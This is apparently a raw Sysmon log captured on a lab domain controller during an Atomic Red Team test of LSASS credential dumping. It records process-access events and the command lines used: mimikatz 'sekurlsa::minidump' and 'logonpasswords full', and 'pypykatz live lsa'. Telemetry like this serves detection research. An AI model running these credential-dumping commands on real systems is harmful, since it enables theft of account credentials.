21:10:25.499{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025681Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.499{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025680Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.499{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025679Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.499{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025678Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.499{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084872C:\Windows\system32\csrss.exe{4DB9351A-A341-60D3-5D06-00000000CF01}6964C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025677Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.499{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A341-60D3-5D06-00000000CF01}6964C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa7fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bf3392d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bea2a82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982034(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|UNKNOWN(00007FFF5BA1CD48) 154100x800000000000000025676Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.500{4DB9351A-A341-60D3-5D06-00000000CF01}6964C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "pypykatz live lsa" C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x800000000000000025675Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.499{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-err.txt2021-06-23 21:09:49.615 11241100x800000000000000025674Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.484{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-out.txt2021-06-23 21:09:49.615 23542300x800000000000000025673Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.452{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\art-out.txtMD5=74F78F9F38C24DA056435BE7FA543F4C,SHA256=C8F3CF646265036BB0086B2A7BBA095866B6584988ABF80F082A11E7103D5CA5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000025672Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.359{4DB9351A-9DDB-60D3-0B00-00000000CF01}6284464C:\Windows\system32\lsass.exe{4DB9351A-A341-60D3-5C06-00000000CF01}2472C:\AtomicRedTeam\atomics\T1003.001\bin\mimikatz.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025671Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.359{4DB9351A-9DDB-60D3-0B00-00000000CF01}6284464C:\Windows\system32\lsass.exe{4DB9351A-A341-60D3-5C06-00000000CF01}2472C:\AtomicRedTeam\atomics\T1003.001\bin\mimikatz.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025670Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.093{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A341-60D3-5C06-00000000CF01}2472C:\AtomicRedTeam\atomics\T1003.001\bin\mimikatz.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025669Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.077{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084872C:\Windows\system32\csrss.exe{4DB9351A-A341-60D3-5C06-00000000CF01}2472C:\AtomicRedTeam\atomics\T1003.001\bin\mimikatz.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025668Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.077{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025667Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.077{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025666Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.077{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025665Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.077{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025664Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.077{4DB9351A-A341-60D3-5B06-00000000CF01}47921608C:\Windows\system32\cmd.exe{4DB9351A-A341-60D3-5C06-00000000CF01}2472C:\AtomicRedTeam\atomics\T1003.001\bin\mimikatz.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000025663Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.079{4DB9351A-A341-60D3-5C06-00000000CF01}2472C:\AtomicRedTeam\atomics\T1003.001\bin\mimikatz.exe2.2.0.0mimikatz for Windowsmimikatzgentilkiwi (Benjamin DELPY)mimikatz.exeC:\AtomicRedTeam\atomics\T1003.001\bin\mimikatz.exe "sekurlsa::minidump C:\Users\ADMINI~1\AppData\Local\Temp\lsass.DMP" "sekurlsa::logonpasswords full" exit C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=3E8C35C224BB122C203AF18277E09C7F,SHA256=5046FAF90C1C5CC9B34F88807626A6AA162696CFE9F18F811A011AE6CBCD77E6,IMPHASH=C6431E6F73792143E85707738705EC33{4DB9351A-A341-60D3-5B06-00000000CF01}4792C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\AtomicRedTeam\atomics\T1003.001\bin\mimikatz.exe "sekurlsa::minidump %tmp%\lsass.DMP" "sekurlsa::logonpasswords full" exit" 10341000x800000000000000025662Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.062{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A341-60D3-5B06-00000000CF01}4792C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025661Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.062{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A341-60D3-5B06-00000000CF01}4792C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B97FD63) 10341000x800000000000000025660Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.046{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025659Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.046{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025658Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.046{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025657Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.046{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025656Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.046{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084872C:\Windows\system32\csrss.exe{4DB9351A-A341-60D3-5B06-00000000CF01}4792C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025655Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.046{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A341-60D3-5B06-00000000CF01}4792C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa7fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bf3392d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bea2a82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982034(wow64)|C:\Windows\assembly\NativeImages_v4